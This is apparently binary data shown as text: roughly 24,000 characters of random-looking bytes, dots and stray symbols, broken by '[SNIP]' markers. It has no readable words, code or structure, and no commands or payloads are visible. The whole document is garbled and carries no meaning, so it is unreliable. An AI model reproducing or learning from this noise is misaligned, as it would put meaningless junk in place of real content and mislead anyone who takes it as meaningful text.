W\....R..(...........?.d.c.?.,r..q.p.d...    ....Z.q..w. S.....1...Y..-T......._.i........M....d....!\....h9..Z.ZTr..qE...B......D...N...(=\J5..........!r.........b.. ......`b...E.Os'..2.S}    /.......h....x.<....G......UuH>.P..S.W.....c....>.8N,P.;.2.Y8......b.........h.d.$A.....v.{{~..;.a....W    k.;....x.H.X..e............%y..Y.......v........1..r/...e,2.[RKf.UN7.K.).....?..../Y".....E?.....[..;n..OWr..+...).....+u95..y.Zb=.~.Y..}]w<..w.......-.o..$l.......a.>p.....1.X.;L.c%T.v. .qU.W....e....v.J.?.......c}.&.0....u......h.>QM...Q.9.Wn    .@...s.%..
......    G......u..,...&9...e....Q.*q..;..
.,..M.H.U5.......|.g.........&....Q.>.t[.b...._.<.."...."C.....Tj..5.{n.:..aBV..@."r...)...Q....W.n=..c_..[zi.r..Huu*.....(^r....{S}o..0.K#>).W......\O.Jo].a.8r...p........R..}.@....|...-&<...J........F.}s...Q.K.I.]. .R..W3,..I......7.]\<.o.k6AC...._. ..a1dX....NM..Sc.F.r.@l...~VD.....u...).....!...+$......
4...u.Ft7:M...........Q.....<&B..VK..K.R.{io...N.g.........WQ..9..,.M.Em.............t....- ..@%.}NC..D..\2#].....W.N'..    .u.f...c..,=..Za......`......f.
...2.Q/.YC.....21.qo...EP.....r....g..U.......Iid..S    .(......g.....\.U.....h..#.........HO..}.~.......n^.b&I..%..tH...r.0#...K>`/]...
..%.......gK..Cw..[f......<n/..-.....*9....p.w.{u......F.SF..*g+.....Y.J....'...(eU0....Z!(. .Q...NC.......(...16.....z2_....o....K..uBP..v..N<.D.p..4    .*.T.J..`...iL. ...s...T~.Pb.Ah8..e.......7|.7{......U.:?2.B....'..U(..W.`/.].....U.r.W.H...3b..<.f....g.C.z..M...zTEc).7....5;..<..l....C..R.W.BB'c..o..]...q.nPL.M.<5v1.S..V....2.......Ibz.`.U.X.uJ.g..8E4.f....'\....iP....._:h...N..h..`H\%d.......A.G[...{.    .h..`..:,.(.....M......|..,2s.f..Z........p.a:.J,.2DR...........D7[.....X.>^...#.vB..,....?q/.........`"....Z....{;;.!..l.G.r.4...F.6...]....,........A.f....b.P.C@.nGF...x..6'.a......eE{...e.....p.p..U>..$...B ^.e...xO....3.s..4.9...g...w.....x$Wv...$...V..w.........$..+PC..}..5f$...F...o...P.@......V{3:....I.7.E.TA.L2^r.c....F.n.L.
%s...IU.F...AwbV1.. ...5..P*..2".....~.._.Dx@../4~%}...4Y.k?.u=>.@>6..&.w..pC.....r.}.%-......F...Q......aP.PCtN..5.d.(=......k.h}N.E......i..e...E.Q.i<..&+;....5dQ/..w...&....kdU......p..q...........}..."..H>u..O..D\i=..x.*..a`..Nd.x..Y.NK    .....X...........
....W.7....>...+.O<..;....qSXz.N......o%CD..a.T./.z"....
.....y...B%.`.K..<....r...@]r.'..x.....S..O..    ..q.!.H...KEhq72.*....~.....XB..`L..7.(..._X..KZ.Q.b...Y.....g%.........'.z`+.....B.`6....;...l{.RaW.^\..Yo....%.I.....+V....(.6.sD... . ..K.k..
5g.rb...Kd.GX.%.....eS(WG.w.
.jH(P.u.,.<..!..?..Z...H..T.%...>iw?y..?|........oc........I.pS..M.0..!.......}.EP..F.[..l...O.....K..
.3Y..&..>....g........\.........
&04.c.......
0...hw...#...wGSqz..V.<...1.. o.b'..[........,....p/.M..!...y.s8.2...}.K.H.a.j..+.U*._.....`v.....;.....
..X....V/Pf.d...`.On...Q.........B....
.G.N.OH.qM.....\...F..-.I..@L..4p.m8....b...._..J..n.Q....-)..>bKm..-@.=0g..H. 0...    ...g.@..8...X.l..*....Q;.._e..+g..%..)S.)3.d.!.1. ....g...R...fo...s...2.1......L.!...`-.P.....F...C$.}*b......q....MFo...P)A..yA.o.....&..!...............]..~/.(...
*..r.]ij...;b....]."...._.3......ycr..7.<.W...S..{..^kW.2.7..V.*...a>R./...Q...G.a%..lkqi,{."Sc.6..
``g.../..h....G..n&..h. .S...G..=..:....(.t./..........1..<...U.q...Z...qp.?... .so....A!.l.........7S(.Q`.~.v..U...0...q.....[JZ........3nl#.(.....p....?.....+.k.G}aT\.
a..{ax.e.......F.....W....$..AX>...VnV...S..K..{."..._.....H.M...b3,.3].@.....*......cj....P..2".......`TX..m.r....4t.0,..C.sML\d._..zS....V.+.)d.2......5.    ....Mv...8....3.n%..,I......Jq.,X...;..5!I%...TG.......(C......BI..R6.6~p.e.......=>^..m......`...$.4A.H..........X.$.......:.q......hM..T...DH(t)_..B...We\...>.l..:.&.v...6%g.kF.+ ......D.\..XB$.v.%.plV2.......T..n.Gw8x...4x5......8..*...,.T.r}......V2.......[.8....Yi........<}.7s.r......<..+......v....8cS.z.....Y..2    *M..{G7....IE...h..k.e .B..x....}...........U}.a.Bd..Y.........TP_......x.#p....G..U....=.y..........P....    .S/n3n.....T......O.GLe....R.mAH.s..,)i...F.0L5B`.v.<....J.w....:...W.i;.|...k..X...z.D..4...a!.j.(..u...
..R..o|.!..q..I.......@j...U.....,H.....2_"%t.Z...z...{.O..\....F...mIQ.^I..N8....wp.B#,...E.y..ixI...../B'2/6....^G_,:..........m...,.GX.+(.{.'S..xD'..T......b........M.=.(w.J..T...RF.....\._...pX:y.|Z..uf.8.H-z....].J.xzP;.-B.sx..O.[2..
Y...Rk.1...__.....=..L.........F...P.....rW.......V..A.]ym..{Lf..E.R...B.....T....g..T;.2(D...O. ..=.8........b%.U'.k...>...{1. .....~RP..k.K.u...M..q....B.....,......#..r..eW..u.......R..~n..?<B..L..G..|j...9..S...'.w...wf....#.:.0T.Z#.8a....e..cO.K/....N......m.../...B.L..1.D.A.$....q...#....T.$F.>.......[.v W..B^dS.......h.....v...Bh.O....\..........'.%?..7.N.8..B..C5.Q-...oA.+u.M.H.F.V=.:G.[.7.....`.....6u..[.a..4...........B."-.r..............iX-=e.|..?p.6......578.s"a.^....."..;.h.o.z-....zl5...8-H....)..vY..G$..O.s....u...>uU..$.2...j*...RI....;.C.2\......?..........DI......#.4.A4..;...|.d..[..8|.e...).3.f.]EP.j...iQg?...R. =4.mB....hQ..........Aw.....0}.lY......^..7...Y....//...y.....h\.........B?....O.aP.".&.`te.U7|:.78.-1'.B.vvo.y..N.._.\,YP[..$....Y.....B.L..Z.9    Q..W.l..?.......Bp....T.0..>..z+..w..K........e.7...kK.."Y..    .]......L......TH..l.M....@.5.C...yn..........t...g.NW#0......:>y..r@.N.......=...kF2.....OF....dz.^.qe[(..z...!J.<.F6.W.......    ....z.6...4r.....F~.sg.p,.    .E....].5m..&\.1.B.B....0.......t.K......P..WGukC$.%...g.ag....C.T...16A.....I...=.|...x.15.B.....W..Yb....%v..8g=...    ..@kB....6.a.\.....>.OEU..B.
c.J...a..p2 .i...g.q.b%./..d.t...p.1.u..<..2..E...u$.-...f.5...fa.........PT..cE;K...........C..}....?!..".D.._aE....).A~)t^.].....|d^&x.n.L..-*3..:.<...    ...B.{..rgB+1.P{e..9!..c.\.....]......B...`.'#.....A......i^h..YA.0d..R....+.h..Y.
......9..OH...To!...9B.Y......R.v67...fO1.).+'....@.'........R6.......L.n&..Qn..N..C...+5....]=...e.<.*...N../..;......}..H.]~#.............Q.. `.J.....yv"V............]|....u....}..........X...K...e..RU...lA..'..V...... ....x0..N]...}....[0.....<Tl;...b<..g.LaM.....Q_s~..5..c.....*..,D.r.c..J(...D.V..............k..e8......q.6..v.|E..bv9.Qxp.U.....B.w.-k .3".\~...;...|...p..L..Ks.%.....>.2..(....n..d.6.(q{'t..=...=..5.a.H....TQ......t.....)T.........dC.c.p..2...>?....')A.Pq.r........g..HO.]^k.....h..G..wu ...)B@...O.....k.....87..%
.P....h...N...T.f@..mLP....0.6....`...~.@D
!{..|../p.....SpGt"bz... ...............}&O.B..=.wP.Z...Qg..P....Fr`x\.%..+la.....&.^...h...9uz.u`.F...M^'.......i
...........Q.........C......zy:.P8.d.y..k'....>..[~.P1........|5d..?cX!....7a\5.@W.4..HD7.\...'...fI..........E*.....{.m..n...2....:...../..z'..ZXJ....d2...+d.zJn.4.l...5....".o...c.....<)..../?K!......'S...oa.^....).... ..i.~...=SS/..1..S...p..d.<...zdYx..;...W.I.......Q......._...
.....-....k}.}-..ptuIHA."Gg,.....Nd......~....W6.\k..l..B.#..&...).R.w.15.....,.........Z.`.W:......u.Z.r.,?.H..........P...6..[R..H.X.}...A..OwU...UD........ohoGC."...Q.H.....7d....@....<v.@?...$3.3.......y.A8.|.-..P(....W..?.....w........O.......z........15.......l..G7...N.R+Xj%.....v...H..u.....Rr..wa.O...P...zi`..Z..0..(Y.f...^v)D..sA.'...l....7.*.;y.?...[-O~..    .....k>.r....{..AId...O.J.Dv.M.@.Bd.    qG.U.J...qG...S\=....<..D%r}(.x......    Y...)..{..7\.Y..i~..fYuC#.Q.J.v.X..`F.....F.#B.U..o6G.6PP...e..0.q|..(..[6..#.}/.......fB.Rr#....3...LVR5~..)..O8.."hw...:..~.....-..8.4.o'|..g..3d..4.r.......I...WE..%...v...d.1o..,]..m`...... ....u0. ...r.....u.U-
.A&.Z`s;: .9.....]..s...0~h....1?.p.r..,o...6c8.0...MW..f.R$..-Ti1.^......&..i>.....F..s.,.WGZ9.L=.tN1A..uNc.zC.....mc6...V.Nk..t...D...)..).#....w...$;.C.e...P........~.(=wK.B.b.R.G.......p.........(..P. n..P.v&.G.......@.......oI.b.....L...'29.7f$.\.)T.P...@.s.s..c[...wn.R....^3'..a>`.c.#|..{..7.b......BZ1..$*.GhCb.=......sy.."...0J.....b.Y+`.    ..8.PJ.....=.....rZ=....E..&....L.......0...Bc..V...9.R..F.\...c..o.">Y..E...../(..........[I.....S.K .`....>>:......rd...tY.....!eD.fmjZqs....L._P+ukR.T...y.'... ./....-..^..^..K.8........8.t...q......[k#.........\.NY..3.#.l.a.UOr.....c......<."&..u.X.....Qk...
@l...^..z+.d*.......A,0\O..]......Bh._...bh.M..k;..zR~!.e.[.x..|R
?.V.H..ge"Dlw.wZ+/-K..k.+"z.+.x.c3-3...G.Z.B.%.w. ..i~8..@.X...z..^....Y..N.|.E.@m.%.$.....6.yTV..VhV....J.qi.".......[...A..4....&.w..Mqx..$K..>......T....6G.......'.NW....O............-n.03..D.@...VA&=|q..\....H\.....X<a. \b.....x> ..g......?.`..Av...bf...YM..=................g>!1.u[...[...ToD..o.~..a.'.$.6;........E....".-1.L.;.<VB...........*.....".z...O.....=.....e.&...[..J5hM..nL..
.....}...Y...z.~.....v......#)..!."......LV@E...k....q.[l.8...}..@....i..K<x+......$...t..n..Y.v7.............Eb.Ny/.n....7. 3R$"=|.....o    .TB0....GrI!^...<9BM*d...\..M..:.?..l`.!'._....[V-$.......IuN..`y4\......3......DE..yH.N...Y..N~..ty..x
_SJ.J...B?..T....y..vkD....{...g.........x.p.^Zk....r..(..L..)..W....._y......AE.Rh(kL.T..T\)...mAH...).~,vMD..,l...0'.:.........u.l....[...>v..Zh.....M....)..qS    A..c....>.J...U...8.U.>..ak..4..........I    .YK|.9K.....[..6.N.......Z.<..a..A.>h..'!.P8...h+;Nx.e.C..g.q9..j5.:WCL....7....].`c..OxL..:.M...~rm.A.u;lo    u.V....U..n..n.M.A2r..S:..U.h.....c....<....p..l....eM...Fw<..w.:.}..*.../n.`........`...C.c}.3.Q$.,...j:.HK...Ji.}.D8M.,......tx.../...P.....8...C3K?l....9......h...Y.....1./.\h.y..zo3.-...2./..aKM.......I&.....C.k.+..c..@...W\f.8.yBis..
......W8..a>u..F=).?.~....-...|....S...3..$.'.l{..pH....U..`..:`.GC.......W..T....}.+.8.F.........]Q...1..sp......J..:    ...5..:.. ..........x..V1.o.:....w0&.S..xh..../
..wW@Q.
...K..|.R....t.....=..Je%..VU..>5.c....#. (.%6.Kq.>....+VnN~.^8._).......b..Z.f.P......}.&...V..1...%.b....P8.#.2.....Ld.....^...FJ,..e.j.G.b.<.+S..b!..+.75.....".sW........R    ....-.<.[.........F..q.....|.%.W    .'.......5..Xn....w..SR.T.p.?....Ec..>..'...Og..N.N.:.....A....!(..........h?.H.(.}.Z..0..!..V{....*...A[...6lW....c. P..RX...\1.}C3..!....6.J.....*.=.r...T.D*.....Ap.#../p.L.D.P...)DZ"..n....Kyh..[.Om.H..[.i....0.v&...W..).j...!.z./ ....h..d_.I....=G....V2,Iii.U......Iw..n..M...(..2..;S..%4Sr..2R..9N..~.......Y!..zX...}...8.fK...0..!.W@.b........m*...L6.T.fa.'..#......z.......p.GZ.B..U6.D.../5O.7..`.KE..m6t~__.d,=....T|.p.........>:N.l....q6...../......
.7..[k.iw..`...FT......[...Su.....k    ~."........    ...}C..o.._.F+..W5.s.,..(......nR'\D..>7...b..3P.N$C\s..._.......y...H*EoH..O.f..s)..n7$S......tR.V#. ..[..fEI.    ...>>..^.*.Q.j.So..]8..@_qT.....?m...L.Og....>o.9. .w...}..qmZ7...........g...e..1;".etn. K..<|2}...I..5#..).P..TH.K...v#'^....@.....+=.l(...m;......]t....7....J.K[....%[........8..>............Y.1A...........J.....r.....F(..o........oG0.......rO..$...002;.#.:...~......D(N.........<|..Y.8Z...c.x!z...P.Iu..@.z.)B...W.Lb. '.Q.PE../s.%..di...._....(..H....\..N.Znn..zi..~.?.]......l.8_MGp3^K.iU...sA..t..x&..a[.L..z.9.......2..td.b~.#Pb...S...$.Z4".p..W...m..TA....J.(/...
.."......W.....:5xo.AB=../..tZV....b.`..uD.h.7..9.....'2..._.
.Q?..Q..aU.YQ..).46.0....3.L9x:~.G....+.M;2u........}...4$8v.Jv........Y.k6...`..+.AP....
XQK2.....`e...7....6)..y...P.9s....q..Dz.j.......g.7e.~W.7..po..w.i.n .vP.    .*....Y$..........$Cu{eKDp.:.V[X.;..H....i..D.{~..l9...T.s./.......w...Z.=....'.O.$..*%..+..C........=Zy...m...C........$.o...c.C.D...I^....M    ..).&^>a...g2.B..0.}..:..U...k@B?K......~#l[8._.....4...%.ru..OEk....; .$.)y...Z4..N.}..Yx......?.
.!<<..=2.......;.......@.    ........#.6..6..IC.....' 3...l.(iAI.....sw3XV.5...............G.|....%.....g..Op.tf...0..!.UcE..j..IP\)......m....8....g^..0...w8.>w..9%......~9.oW....T..+a....O1P..f.yV...Ym..r..irJ.M3.h..#......q..........>..5..O..#1.a{..g...PSDL.EC........S.>K.m..........WM.....C.....Do..Ei@.......    .U..q.n..|.D4 ...i...S}.KNJ......h&D...D..(..s.|.d.".....T.zK......Y.....K5..A.......]_...{.....:..9.f...|B{......:.....W....T..l"W...u~....9.....a.j.5,.1....0.y.9.}......0...;...A9D.....)...7w......`Lm<..w.J:H_....`...O....p....KbP;eW<.M.......!..U.O.g].L......\gx>..9j0....h..L.w.x....J~@..../.q.....G.k+..    ..A......At.....3[.j.    p..2.?>!..|...v.TZ..*o....B...~R.o.f..."...G..]`.E...y^......x....+....$nb....V...dyD|...18....^D......7.|.-6y........oH0..[......r...g.K...qz+......M).....:...b.1..b.d.E.g..).z...:$z..(.r..h..{    .....:|...P..
...[SNIP]...
.8X..}....g    ....(......Ov..KNP..E..B..he.M..l..rN.JO.}...X....4..j.h..G.k ...o?.`...l...nk.,f.kSX.Y.........l....&-....s....    -.C..;.o..-..8    k.I"..    4.{..C.2..........3...:.R.Ll3.-.(C. ...[.B..|z.L^9.!.<?.,8..o2.\.6....=...+B..4..K..V<.^.b.c...-Bt.....V.r.v..C..    :.7a....$.[.~..TN<.g^.l...[/}.<.@.Jd.zu.&...|5%5m../1..u-S..|...7.W.&.......<....ubn...!..9J...s..b...SD....]....$9..h..oX\/..........Dii.4....ea.zM.H.u    VL_.<g...lt..x.}^D.    ..    ....W..?"..o.....07).:.M.......g    U.....nCA..]P...{...A....o.`..O<.2..V......0....Yu"....l..A..<B*.".. .j0...L.Q.*e....?Q..nC2..`.8.Az......O6_..E.4>.}Wo...@...A~1e....C...}(._L.
...e2...-%...`...t.6$-.
...2..z..P...i.8w..........j.M..#&V..{v...dsT..8...5G.o.:fj..wB4..|D...q......Z/....^:...g.?|..&3.5.2.....1P.H.*|.U*./{...&.lm.m.>b.......T_#=E2@...!R.....>...."S..-.q....yg{....G./_..u!.%..K.q...S.S>.t....%..6.mo....2.P......yb6...._.u.H..7!....?....X....bx..=E.G.*Y.\...hV2T............(6....1......    ...".>@.W..z....6_..&l.t...(Py7......#C...^!.o......A..^.>A...K....HwkL.E2X..M.X.9.R3..+..f......)b...B1
....H.jqE\vE%...
.).pPp.n&.Ck.uV.R.S....../........
.._.`....Mq.=..Ty....".y9@1& .1y...&...~.2..@I.....L!R....q..ri...).d....c.......4.`4q.>....._..a50....,..#=.&.r.._...:,.aZ.!.;r.#9.>g.A.;*`o...i.Dp.@....5*2..o.z......#2>]...BH..N.oH..t...~.4.N........z..zc....N..\J.Y..6..>.\.....)h..X..p....D...b.........'.D..s..B.WB..-.X........S..%..f........yH.............T.->..'..r.7....!P....#.nL.......=^.d......u....}if.9GV.<...d.4....k.-*....    o....R...W&n/i...C.l.W...>3...UK..Br...0...a..m$..!.. ..x.....[o.M.....P!...h@.u.
...].......Na......mb.....6Dy......F..,.7.n...LC{p....D.!B..3}Au...@h.....?(....d.C.....,E'.X....k...$.......%.....<f.......2O...2.}:K.c..T./..c?D.Y
.*E.....Cx.......?.3.}o.!...\
.Y..v!../#.........R)*..."S. ..........i..V5...H."..G....Q.r...+..U..ba3..i..................#..0..RcbE..dY+B...D...`.XsP.9..........P..?k.lK.3.=.C...>...b.`.()..r<G..-.../.F.....?......z`.t..{.......|k..Kq(\.+...q.+m.S..V1._.!p.:_......../..G..k.....fK.j{@...I..T*...#L..w.)=..yC...z?..p.../o....27;........Y....!P....H......!.........j t_......7.ki6..r..U.hu...h/.<...M!Q..[.vH...;....
.f.u.G...8.........o.v.m=...N.c%..P...)...[.;4G.*-.......G....4/...._.!g.^.....R.N.I..!~.;.....,..G.....{...V....c9SH...B....]..FV/..B...I.
.'.....p.T./!.<.I..f.A..`.........b..S(*.v....%..    .G..a....k..}e..)pQ|.U.@M.gQ.pA_L"..N.J.MD\.!})....qK....,..-......"..;.j'...c...j,...w.+.....jy.0.g...E..?..0.}.$.=..*...Hd.......    4..+.a...[A...    ?F6......!wL.+..[=DK..J1.........p.!4...|.8.}..<I..-uog..j.........#..K..X..Y....3=.:aL' .z.....bz..dv-........N .....>.O...\z.i*V4.......[g7$%.......P....x.-K.......WE.j......A\,.2.p.b).t...B.l..-@.s..r....._ng.........c.V.    .%?.....<F.^.^+.m.u.Fz..cGZ.v:ol......2...../..fX..<.......=.V3..X.l.Z-.w.....Y..2kN..s.n......>..n...w....#?.>.N.U.....M...W.hm/...{s^....w..l.2....:..
...M5E.c.3.N.{.............9...a...]...].'.0.X..(..m.....Y^p....U....~..,.{.E.J....L7...~.6yk.[.JG....[.I.....dyB.V......D..T.%o.3.l.+.,.J.#..i3..#.a.[8...4u.%...].........*.O.....i$....:..=.......Q.t.V.*..x.m....?(...C.E.v.].KI. ..D.ZU...v4.%L.7....^./:...........FP.).Y*3.\g..2..<...._;.o.=.~..#...s.3../"O8.Pj.a.ku^.C.\....X.....t(..Z.PJ=..[<...%....?'T.....U.......~....N    y..R....~o.5...I.et-a...M.....    ...k.u...&.,...1..w.....0\.|.#@.Tpq13....,9..+C.....f!i.......i..uM!s.......l).X......7.Dyn....%1P.....~d.;gZ.1#6...(.......7X..0.. .$"...[x.G0.H+e....Hfn.a8.q.
e....2l...nO.w...oA.g..C+_.<...D........e}..]..w...M...x.........    .[..:T....`3*4.a.N.!.^....../N..Z..i.d.Q.j!Y..\.....$....!.LK......=...K.......h..;>.Wp.....co6Xv.6..}E.<..&.I.....w.C\...g....v.....a...~W.B...n.^..h......h.p0.x.-.0....RS...O.gY_......._\..p.9..B6X&.l"....Q...C.7.........0.X
...)....zh:.{F3*.}.?.....\.P...P......%....$...... .....?>..l..4}......X..6...A..@.9...*..O...`M..;.#.".f.........1..Y9.j.q....U.e.P../..-.....A...PL....Xj.:...cb.x2[.....A...M..].........c.......=......
.6........S..@.gL....U*...>
...[SNIP]...
<n..    t...:a...z.q.]QK.X1...,,.8..W.g.........5.....U..#.>..o..f+..100....P.$K.7Hi.?...b.jz..S.I...OK......s=J    ..[    .tz(    1.c....J.......g.L.?......>$>...g..VK$..0..k.....eq.F.o3..MT..-.....M<%nk...j?.$E....D....,.).F.d.Qe-.2js..]...]...d....s..G. ..)......HI..[G.P....|6..!.h3US.T[H....:k.).[...HY..R    .c.>..Mh......*.;....A..i'...4.:.f...D.....pB(.v....J.J.}..N.z...>y.t.6.mN.@=.=*..........S.7=[..`.=W....U.A...ht.4..f...n.O(.$}+......nT..0..$?..'CJd..l..$8;...,..S.........'........;...;.().......;x...9.4}..,..u.....6.UB....](t.....0...    D..6..x...4i.S..I..........n.....Jk..M...../.If- ..~._...~``...>..,)...b^...7jKI.Sv"......2.Y...}z.8.K.B..|..R....d..W....[...K..h..j.*..>....3..9.. RYlO..de....dO.F&...#..b\.W*...f.L....`........0..).
5.y..u...x)|..C..o.:u..4...e........?...X..0........j=.I...5]4.J.f....=5[l`p.....D....u.l.
...k.$H".<..FO..l    .,,4.....Ms.fe9#.......PN..'}..=.b..1.\<...?...Cna]..U.'..1. ....!......^...>.......5."..f..h...L....1.{..6.c...f.<.>!.>U.=.|.)-&...D|./J.P4.W7.t.y].....@.o#..../....u*6l.H..M.....$.....dx.O....q*wB._k#..5......Ok............h.`O.J..{v..".....]#-...a...;.i..l.B...J..".l.pl..>v%*..a.9....8.....*..M...4....L....].!h^..PRx.n..*..@].n.+.C..r.5H......P.g]1....(
..d-.K.@M..5G..D....]c...7.7?.nZv..4......9..*........0.#..w6...HD4............9y...\..:.........p...Q.g../L..sP=(..I,..8..r..,..."<x{..X..7.....[gn_.T0gzD..G!...z.}.x...F.x.....^.<p..t..y%cC.{..k...[AD...
.z6...."..%..RN...Wz?..;..Z...    >7Q.z......PH.......Wd.l....EuY\.y9ceN.i2../..!F.,6....f...F.zi....y.D..w.h.....N.......T...l.9.<....R7)..........~......xcI7Ii...c.py....|b.`...r.....i......Y.S...Zz.Qj..p`;.p....9...<.a...*.....Iwct..fqT6...pD.j/h........v9w..'I..o........[..Q~..?\.z...E........._.{{6DI.ud.I#.@.(W.jRs.A}......qC    ..=..<.......n...;B9.5=.p3...C.....1.l]FnwZ....x.Dc.9....R......x........BB..U..J5..
U...........u.dN.n.\:..#.;...fe...B ..U0".L.0.......j....B.Og..i..8..w....HBt..d..]F7..........u.L.8S..{.l...:.......5..8V..2>U.)x..*\~u..JR....E.=..F."..........5...[u..7j.A.....\.u.p.y.B.C...s4......@..DH]\....T....^..b....Hu/.j..T..F...@`]E.......04..^.Gz.+G..^..B..y8HV.E...W@-...u...~.H....S......]M.p..i.-.|..+.......j.........7..v...CX4....{.....4.....|.U4.....%....%....r.:E(..j
..49...z..L....N~W. x.f..".}.#..J.S.|Xu....."..[
.....:d.+.^e.bL....1.nX.6.S....]..........J|.j.....Ah..?...9...W*`.d.o|..~%u..Wj%..."..|...r................;H.....9c..k.. /.\...c....7.-cf....x..w...4....'.;]..h(...|.O4..y*....k6.....Ot......#..;..........v[...eg...).....K...n....\...Ncb..'n...Q`s..V_.S..:..YhD._.K..]o..yb..(I..R...Y..x9(e......._*..N...0..`8R....p.
l{...9....uj..?1.4...\~%.s.M...+.cJ~.    ...~.G.S.&..;.W..z.....;7.].W8....N+..1/......=.4..*0.._    ..._..V..D=d'...0Q`.1.r.......1.A....al..#...g..:.....    ...'.i....a9.X.>.    S.<b.....40..R.~..L...sUnN"....X..[.j.g..7.I......j..M........tX.....8.0.....(K&l...a.......
.nb...~.k................EMm..}.w-..q.    !...(..].UJ..P..u..d.....}<V2...d,.o.g...F.)hf.C.<..o[)^
...4.:q..T...^ttX.9..x.}.~.....6\X...V..C.3.09F..>..m4..sX}O...g..r.5....?...%.7|BO.f/f........-p ...........q..z(./..P }8#~....I..h..U8.C...6aot9......be.....<T}......4[..b..X|.6.hB.0fp..hg*...V.J.7.xe......r.....bI.B.(B..........y.+0...>.@j'..B...j...B."?+y.+....[p.7.....0.^.......~.+.}...9@H5b.1w..~Wh.u.).i.s.j.4|.....#l..    \+..8...#\u.........we..A...x..@.e.j.. ]...K].....[..^H.....z..
...mV..UR...L3..16F}...t.. }..p.0(........9_.-.-...B[.+.U.;k.P......@..|.x!+.#...c....JF...F..'|..Y.....~...Q#..!..:xp0v...?....F$(..P.2.    n...`.e\.....dr.M.....\dE.U.;m..#..l.1....Y1....O&..f...<.).L......1...    .1.5.(..A/jy*........K.s..C..... f....M.=.."_s..P....#...`"I.Q..h.......U....Y6g8....J....?]........nct...B.M...o..B.$.....Nv.`....jN....,B.gh..8....*..u..........M.k~W.. ..l...    D..b....QmWX}5c..bH.zi.v|.).. ...A...e..mH$J`{".&.....s..@M.......d....Z.........MF.&./].Q......./.vl...YF>...l1...........%%........S....r
u......c..7B.,NA....dH..8e....*..)...i..8z.*b...'.1bX........4c.....I    ...m.Z+wo.#.......~D'.....ir.NX{:/
.40D9..F.xB..A...d.$...OJ..../.;8...+V.Es...N.....Z...........sA....<.;..k.P....7....C_{........S;{K.ix..b.;...oV.M..1..L2O}..G............{.[.l........2........mB.J...i...$.U...B1H.>3..f..p........h...._....1%V@u.SO..........^0...s.2....od.J.q^3...~..Y.Wd......x......a!b.....h.W.v..O>...H:..;....9D:g
.....)...+.......P...Du.T.e..h..n..$.2P.....~N..H .(;GK.h.;.k.H...O........    f    u8.............B.
mgN...K.....0..".. .k..[l.l...)(pr..5..C......../.S.q..Xn>w.....:...1.].7@...pf...9F....J....&..og@.UY...&.    .......*<...z..x.a...............ncQq./    9"......0..).t...=...,Q......).......<...1lV._.d.:.s...t...Oa.TB...o......ht..A<...f.Y..Lg&.`.....W...a....~]...P.l..J|    .I.{Y..d-..P..........(_w...~.L........=.o5h..................Q8(.~.m.^.@.s...=`.....4h..-+!...E.Zk....8.{..u.....>...G.e......3..0.4    ..vsO..*.....,JgA~.b9..;*.?..:.&6(.....Y..+JE.4@...x....p...I.a.r....T..wN..6.........U_t..Op....x.I.1._.?g.2.5.....5.U.4..^.i.    W...Y.+.P..}b....v.z....ANbGN..M.t.B..F.O`]..G.dUm.D..I..Nl1...KN8..j.X.~.h.)!jQ...#}...>..T.Z.....GF|..........fy..s.X8..-[<...1..i...i.W....`
AB...$....#...C...t$.&'..4H...~.s ,..)z$.&.B.r...H.k|...8..../.=....8o.e.....4.....~..U....U5..=..p.....S.ad.....}..z...Q...V-4.....y......E.-..y\2..X......d.`*.{......<`...u.|G.}n-.a.....{..\.B..b.X....."./.}....D...z8W.u..=W
.....T...Z3".=....Iv)(,b.F..\..i... .*F..:.B........{r!.Ny9...... .ins..).......x..j....4}OM....k.....T..).z./....a..3f.x..^.?Nz'\
......*I....6.&t.!c.a..`.}./2J...."..8s..V..h.+U......h?!.....D...Svw.XY.A..'.-v....z\..2....s..=}z...C..3[.E.....l.....$V].0..3..........S`............. ..[..Q.FE<.J.O.=.....,...$H.....o.....%....R[.b..._.y.0......~.v..g.E....%.;.....AA...f......d.bk..&22....H......1.{..M`.[..!....>.f.P..vy...bmX...}-].........\
p=.J...{].8.wA.TY.H...O..XaC....Q&....ZID....uUj.....F....i>...N...l.    N.......}G..
@...k......Q=..`    .>5R).k..G.VjzK.0..s.U... pN......IJ....=Q..../xTP.Ko3.....6.r..^..+G.L.X...5.]. I...P...`,.}..>G]..HeWM|.WEZP.O.#.....1[......dh.....1...`    ...-....(.{O?i.w^.lSqCj.wC...>.$.....6....$...>..u.......`I.......@+....pH....
.t.........RE....<%w.6#............O...=v.'*!.pi.{..'[..    .V.D.RI.).).6..>.......56...e...h...,N.G...#.S..[a....r$M8v..,......o....=..K.e.5]..G.W...e2d...z4..Kk$.....%.......l....f......\ .E(.)v.Gn..N.y...MA.;......,..Vv.q{.EQ.=<..8..N. ...../@f.. ....#E......^M.1|/m.I.    ....#/.K..3@Br]......wJn..bD.~p.......Q'.60.%,.W%..pe......6.K..........|.+'{.*#O..g...%Ql.m~..].!>..A............L.......cGi:...n...:].y...&#.W.....7.3A.....h>.p..C.#..d ...@....+.Pc).r.C....kID..%........o."(......R.r}#....t..2    ..= (..4w...#....:s..}f.m.................{...`....p.p...fr.+6.2Hf..Du`..<bC......j.-.....+..g..Wu....0.k3.7R..8..3Z.LvUl`..*U..23`.Q..Xy4..    .Wz.l.y.\G.x........5.D.....r..]X......d.`.pD...3.&.T..Q....:Ke`..n......+.G...4'..f.......Q..........jYV.......>M..*...........s..a..7.c&=...._.DZ    AIv:..)
O..Q...f{....+.6...........gT.U[..f.W.....1_\L..$..'......B......}..),.B........O.G.-.]g/...o.7..c.b.K...........M......_&s7hX./..J.V.A
7.9..z...1@T...mNF~..d
.z_aU...3.rW...........F.34....3ij...,i.N....l....Ih....Cx. ...3.}..r....$......i..V)..K.W.....z........NN<`...E..,...F...5....)IbR08o..}.e...EB..a..B....[cA,.......@....K..6Q..t.E..;U..|...^......].RO.~...n......W.........0Fz.QL.F...].t.j.....>i.......wW..V.b.H..?dH...3.6+..x........h...x.G..)..F......7.7N........_..I..0[.lzS.Fd......2?E>.6.~.=.....sp.;..hA..R1..5c......F.l..........]1.=.|.v..Y<?.DzzI.....O...#.3){...9.g'B%...^i.1.Z...e.........m.L%.4.N.....}DpPx..%.../h.s7.f.O.M.>....sl.3..N1..5.4......Js..H....9..~.5......7..b...u.=.BLp.._...?....&C.. ..T...?..x..xp..+e.m/.......W.&..S=..k+..|........*jCd...bG.g..m8.f.J{=    U..{......Fb,..
...VZ......W!O..n.P<...T..+s......F.....h..bo.;%...[...-..<..-.w<f.K.1.^TB$K..{1..A........C....*.+.P>x.f..:.aB..uX.U..XVN...
